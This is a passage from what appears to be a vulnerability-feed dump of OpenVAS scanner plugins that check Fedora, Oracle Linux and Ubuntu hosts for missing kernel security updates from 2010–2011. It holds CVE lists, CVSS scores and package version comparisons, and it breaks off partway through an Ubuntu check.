value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.14~106.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:51", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-03-15T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-2134", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0521", "CVE-2010-4163", "CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4165", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-4346", "CVE-2010-2955", "CVE-2010-4082", "CVE-2010-4649", "CVE-2010-4169", "CVE-2010-2963", "CVE-2010-4158", "CVE-2011-0006", "CVE-2010-2524", "CVE-2010-2478", "CVE-2010-3698", "CVE-2010-4650", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-2071", "CVE-2011-1044", "CVE-2010-3442", "CVE-2010-3705", "CVE-2010-2954", "CVE-2010-4648", "CVE-2010-3880", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-3081", "CVE-2010-3067", "CVE-2010-2962", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3079", "CVE-2010-3301"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310862910", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862910", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-2134\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055238.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862910\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-15 14:58:18 +0100 (Tue, 15 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-2134\");\n script_cve_id(\"CVE-2010-4165\", \"CVE-2011-0521\", \"CVE-2010-4346\", \"CVE-2010-4649\", \"CVE-2011-0006\", \"CVE-2010-4648\", \"CVE-2010-4650\", \"CVE-2010-4163\", \"CVE-2010-4668\", \"CVE-2010-4157\", \"CVE-2010-4158\", \"CVE-2010-3874\", \"CVE-2010-4162\", \"CVE-2010-4249\", \"CVE-2010-2962\", \"CVE-2010-2963\", \"CVE-2010-3698\", \"CVE-2010-3705\", \"CVE-2010-3442\", \"CVE-2010-4258\", \"CVE-2010-4169\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-4082\", \"CVE-2010-3904\", \"CVE-2010-3432\", \"CVE-2010-3079\", \"CVE-2010-3080\", \"CVE-2010-3081\", \"CVE-2010-3301\", \"CVE-2010-3067\", \"CVE-2010-2960\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2524\", \"CVE-2010-2478\", \"CVE-2010-2071\", \"CVE-2011-1044\");\n script_name(\"Fedora Update for kernel FEDORA-2011-2134\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC13\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 13\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.34.8~68.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:20", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-03-15T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-2134", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0521", "CVE-2010-4163", "CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4165", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-4346", "CVE-2010-2955", "CVE-2010-4082", "CVE-2010-4649", "CVE-2010-4169", "CVE-2010-2963", "CVE-2010-4158", "CVE-2011-0006", "CVE-2010-2524", "CVE-2010-2478", "CVE-2010-3698", "CVE-2010-4650", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-2071", "CVE-2011-1044", "CVE-2010-3442", "CVE-2010-3705", "CVE-2010-2954", "CVE-2010-4648", "CVE-2010-3880", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-3081", "CVE-2010-3067", "CVE-2010-2962", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3079", "CVE-2010-3301"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:862910", "href": "http://plugins.openvas.org/nasl.php?oid=862910", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-2134\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 13\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055238.html\");\n script_id(862910);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-15 14:58:18 +0100 (Tue, 15 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-2134\");\n script_cve_id(\"CVE-2010-4165\", \"CVE-2011-0521\", \"CVE-2010-4346\", \"CVE-2010-4649\", \"CVE-2011-0006\", \"CVE-2010-4648\", \"CVE-2010-4650\", \"CVE-2010-4163\", \"CVE-2010-4668\", \"CVE-2010-4157\", \"CVE-2010-4158\", \"CVE-2010-3874\", \"CVE-2010-4162\", \"CVE-2010-4249\", \"CVE-2010-2962\", \"CVE-2010-2963\", \"CVE-2010-3698\", \"CVE-2010-3705\", \"CVE-2010-3442\", \"CVE-2010-4258\", \"CVE-2010-4169\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-4082\", \"CVE-2010-3904\", \"CVE-2010-3432\", \"CVE-2010-3079\", \"CVE-2010-3080\", \"CVE-2010-3081\", \"CVE-2010-3301\", \"CVE-2010-3067\", \"CVE-2010-2960\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2524\", \"CVE-2010-2478\", \"CVE-2010-2071\", \"CVE-2011-1044\");\n script_name(\"Fedora Update for kernel FEDORA-2011-2134\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.34.8~68.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:35", "description": "Oracle Linux Local Security Checks ELSA-2011-0007", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2011-0007", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4242", "CVE-2010-4163", "CVE-2010-3904", "CVE-2010-3078", "CVE-2010-4081", "CVE-2010-3865", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4072", "CVE-2010-2955", "CVE-2010-3437", "CVE-2010-2492", "CVE-2010-4074", "CVE-2010-4083", "CVE-2010-4082", "CVE-2010-3477", "CVE-2010-4080", "CVE-2010-4525", "CVE-2010-4158", "CVE-2010-3876", "CVE-2010-3698", "CVE-2010-4162", "CVE-2010-4263", "CVE-2010-3442", "CVE-2010-4248", "CVE-2010-3705", "CVE-2010-4079", "CVE-2010-3880", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-3081", "CVE-2010-4160", "CVE-2010-3067", "CVE-2010-2803", "CVE-2010-3084", "CVE-2010-2962", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3298", "CVE-2010-3079", "CVE-2010-4077", "CVE-2010-3861", "CVE-2010-4075", "CVE-2010-3301"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122244", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122244", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-0007.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122244\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:15:22 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-0007\");\n script_tag(name:\"insight\", value:\"ELSA-2011-0007 - kernel security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-0007\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-0007.html\");\n script_cve_id(\"CVE-2010-2492\", \"CVE-2010-2803\", \"CVE-2010-2955\", \"CVE-2010-2962\", \"CVE-2010-3067\", \"CVE-2010-3078\", \"CVE-2010-3079\", \"CVE-2010-3080\", \"CVE-2010-3081\", \"CVE-2010-3084\", \"CVE-2010-3298\", \"CVE-2010-3301\", \"CVE-2010-3432\", \"CVE-2010-3437\", \"CVE-2010-3442\", \"CVE-2010-3477\", \"CVE-2010-3698\", \"CVE-2010-3705\", \"CVE-2010-3861\", \"CVE-2010-3865\", \"CVE-2010-3874\", \"CVE-2010-3876\", \"CVE-2010-3880\", \"CVE-2010-3904\", \"CVE-2010-4072\", \"CVE-2010-4073\", \"CVE-2010-4074\", \"CVE-2010-4075\", \"CVE-2010-4077\", \"CVE-2010-4079\", \"CVE-2010-4080\", \"CVE-2010-4081\", \"CVE-2010-4082\", \"CVE-2010-4083\", \"CVE-2010-4158\", \"CVE-2010-4160\", \"CVE-2010-4162\", \"CVE-2010-4163\", \"CVE-2010-4242\", \"CVE-2010-4248\", \"CVE-2010-4249\", \"CVE-2010-4263\", \"CVE-2010-4525\", \"CVE-2010-4668\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~71.14.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~71.14.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~71.14.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~71.14.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~71.14.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~71.14.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~71.14.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~71.14.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:27:15", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1083-1", "cvss3": {}, "published": "2011-03-07T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-backport-maverick vulnerabilities USN-1083-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2942", "CVE-2010-3904", "CVE-2010-3078", "CVE-2010-2066", "CVE-2010-3297", "CVE-2010-2248", "CVE-2010-2226", "CVE-2010-4165", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-2955", "CVE-2010-2946", "CVE-2009-4895", "CVE-2010-3437", "CVE-2010-2521", "CVE-2010-2943", "CVE-2010-0435", "CVE-2010-3477", "CVE-2010-4169", "CVE-2010-3310", "CVE-2010-2963", "CVE-2010-2524", "CVE-2010-3296", "CVE-2010-2478", "CVE-2010-3850", "CVE-2010-3015", "CVE-2010-2495", "CVE-2010-3442", "CVE-2010-3705", "CVE-2010-3848", "CVE-2010-2954", "CVE-2010-4249", "CVE-2010-3858", "CVE-2010-3067", "CVE-2010-2537", "CVE-2010-3084", "CVE-2010-2798", "CVE-2010-2962", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3298", "CVE-2010-3849", "CVE-2010-3079", "CVE-2010-2538", "CVE-2010-3861", "CVE-2010-3301"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840605", "href": "http://plugins.openvas.org/nasl.php?oid=840605", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1083_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for linux-lts-backport-maverick vulnerabilities USN-1083-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Al Viro discovered a race condition in the TTY driver. A local attacker\n could exploit this to crash the system, leading to a denial of service.\n (CVE-2009-4895)\n\n Gleb Napatov discovered that KVM did not correctly check certain privileged\n operations. A local attacker with access to a guest kernel could exploit\n this to crash the host system, leading to a denial of service.\n (CVE-2010-0435)\n \n Dan Rosenberg discovered that the MOVE_EXT ext4 ioctl did not correctly\n check file permissions. A local attacker could overwrite append-only files,\n leading to potential data loss. (CVE-2010-2066)\n \n Dan Rosenberg discovered that the swapexit xfs ioctl did not correctly\n check file permissions. A local attacker could exploit this to read from\n write-only files, leading to a loss of privacy. (CVE-2010-2226)\n \n Suresh Jayaraman discovered that CIFS did not correctly validate certain\n response packats. A remote attacker could send specially crafted traffic\n that would crash the system, leading to a denial of service.\n (CVE-2010-2248)\n \n Ben Hutchings discovered that the ethtool interface did not correctly check\n certain sizes. A local attacker could perform malicious ioctl calls that\n could crash the system, leading to a denial of service. (CVE-2010-2478,\n CVE-2010-3084)\n \n James Chapman discovered that L2TP did not correctly evaluate checksum\n capabilities. If an attacker could make malicious routing changes, they\n could crash the system, leading to a denial of service. (CVE-2010-2495)\n \n Neil Brown discovered that NFSv4 did not correctly check certain write\n requests. A remote attacker could send specially crafted traffic that could\n crash the system or possibly gain root privileges. (CVE-2010-2521)\n \n David Howells discovered that DNS resolution in CIFS could be spoofed. A\n local attacker could exploit this to control DNS replies, leading to a loss\n of privacy and possible privilege escalation. (CVE-2010-2524)\n \n Dan Rosenberg discovered that the btrfs filesystem did not correctly\n validate permissions when using the clone function. A local attacker could\n overwrite the contents of file handles that were opened for append-only, or\n potentially read arbitrary contents, leading to a loss of privacy.\n (CVE-2010-2537, CVE-2010-2538)\n \n Bob Peterson discovered that GFS2 rename operations did not correctly\n validate certain sizes. A local attacker could exploit this to crash the\n system, leading to a denial of service. (CVE-2010-2798)\n \n Eric Dumazet discovered that many network functions could leak kernel stack\n cont ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1083-1\";\ntag_affected = \"linux-lts-backport-maverick vulnerabilities on Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1083-1/\");\n script_id(840605);\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-07 06:45:55 +0100 (Mon, 07 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1083-1\");\n script_cve_id(\"CVE-2009-4895\", \"CVE-2010-0435\", \"CVE-2010-2066\", \"CVE-2010-2226\", \"CVE-2010-2248\", \"CVE-2010-2478\", \"CVE-2010-2495\", \"CVE-2010-2521\", \"CVE-2010-2524\", \"CVE-2010-2537\", \"CVE-2010-2538\", \"CVE-2010-2798\", \"CVE-2010-2942\", \"CVE-2010-2943\", \"CVE-2010-2946\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2960\", \"CVE-2010-2962\", \"CVE-2010-2963\", \"CVE-2010-3015\", \"CVE-2010-3067\", \"CVE-2010-3078\", \"CVE-2010-3079\", \"CVE-2010-3080\", \"CVE-2010-3084\", \"CVE-2010-3296\", \"CVE-2010-3297\", \"CVE-2010-3298\", \"CVE-2010-3301\", \"CVE-2010-3310\", \"CVE-2010-3432\", \"CVE-2010-3437\", \"CVE-2010-3442\", \"CVE-2010-3477\", \"CVE-2010-3705\", \"CVE-2010-3848\", \"CVE-2010-3849\", \"CVE-2010-3850\", \"CVE-2010-3858\", \"CVE-2010-3861\", \"CVE-2010-3904\", \"CVE-2010-4072\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4249\");\n script_name(\"Ubuntu Update for linux-lts-backport-maverick vulnerabilities USN-1083-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25-generic-pae\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25-generic\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25-virtual\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-25-generic-pae\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-25-generic\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-25-virtual\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-25-virtual-di\", 